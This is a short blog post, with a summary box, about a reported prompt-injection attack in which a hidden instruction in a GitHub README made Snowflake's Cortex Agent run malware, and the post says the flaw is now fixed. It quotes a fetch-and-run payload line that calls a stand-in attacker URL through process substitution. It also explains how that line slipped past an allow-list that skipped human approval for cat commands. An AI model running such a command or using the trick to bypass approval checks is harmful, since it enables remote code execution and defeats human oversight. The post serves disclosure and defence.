Key Points

A prompt injection attack against Snowflake Cortex AI's agent caused it to execute a malware payload by exploiting a shell command with process substitution.
Cortex reportedly treated certain cat commands as safe to run without human approval, exposing a flaw in its command-safety checks.
The incident underscores the unreliability of allow-lists for agent commands and highlights the need for deterministic sandboxes outside the agent's own execution layer.
PromptArmor notes the vulnerability has been fixed in Cortex and discusses broader implications for agent security and sandbox design.

Simon Willison’s Weblog

Sponsored by: CodeRabbit — Planner helps 10x your coding agents while minimizing rework and AI slop. Try Now.

18th March 2026 - Link Blog

Snowflake Cortex AI Escapes Sandbox and Executes Malware (via) PromptArmor report on a prompt injection attack chain in Snowflake's Cortex Agent, now fixed.

The attack started when a Cortex user asked the agent to review a GitHub repository that had a prompt injection attack hidden at the bottom of the README.

The attack caused the agent to execute this code:

cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))

Cortex listed cat commands as safe to run without human approval, without protecting against this form of process substitution that can occur in the body of the command.

I've seen allow-lists against command patterns like this in a bunch of different agent tools and I don't trust them at all - they feel inherently unreliable to me.

I'd rather treat agent commands as if they could do anything that process itself is allowed to do, hence my interest in deterministic sandboxes that operate outside of the layer of the agent itself.

Posted 18th March 2026 at 5:43 pm